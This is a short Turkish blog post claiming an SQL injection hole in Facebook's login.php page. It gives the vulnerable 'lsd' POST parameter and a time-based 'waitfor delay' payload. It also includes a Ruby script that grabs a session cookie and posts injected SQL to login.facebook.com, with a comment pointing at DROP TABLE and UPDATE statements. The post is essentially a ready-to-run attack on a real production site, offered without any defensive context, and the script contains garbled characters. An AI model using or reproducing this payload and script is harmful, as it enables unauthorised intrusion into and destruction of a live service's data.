Facebook sitesinin login.php sayfasında sql açığı bulunduğu tespit edilmiştir. Bu açık ile ilgili bilgiler aşağıda verilmiştir.
# SQL Injection # Path Sensitive : https://login.facebook.com/login.php?login_attempt=1 # Fault Find By Gsk | Whivack # Code By, Gsk | Whivack # Variable POST Sensitive : lsd # Thanks Team Guru-Security-Klan (gsk2.fr) and Inj3ct0r.com (Exploit Database) by r0073r # Contact Me : whivackwdcompany@gmail.com (French) # Useful Software : Ruby 1.8.6 # Download Ruby 1.8.6 : http://www.ruby-lang.org # Demonstration Command : lsd=hUwMm%27%29%3Bwaitfor+delay+%270%3A0%3A15%27%3B-- # Result Command :Bu açık ile ilgili ruby kodu aşağıdadır.
require 'net/http'
require 'net/https'
http = Net::HTTP.new('login.facebook.com', 443)
http.use_ssl = true
path = '/login.php'
resp, data = http.get(path, nil)
cookie = resp.response['set-cookie']
# DROP TABLE ... CREATE TABLE ... CREATE VIEW ... UDPATE ...
data = "lsd=%27[SQL Instruction]--"
headers = {
? 'Cookie' => cookie,
? 'Referer' => 'https://login.facebook.com/login.php',
? 'Content-Type' => 'application/x-www-form-urlencoded'
}
resp, data = http.post(path, data, headers)
puts 'Code = ' + resp.code







0 yorum:
Yorum Gönder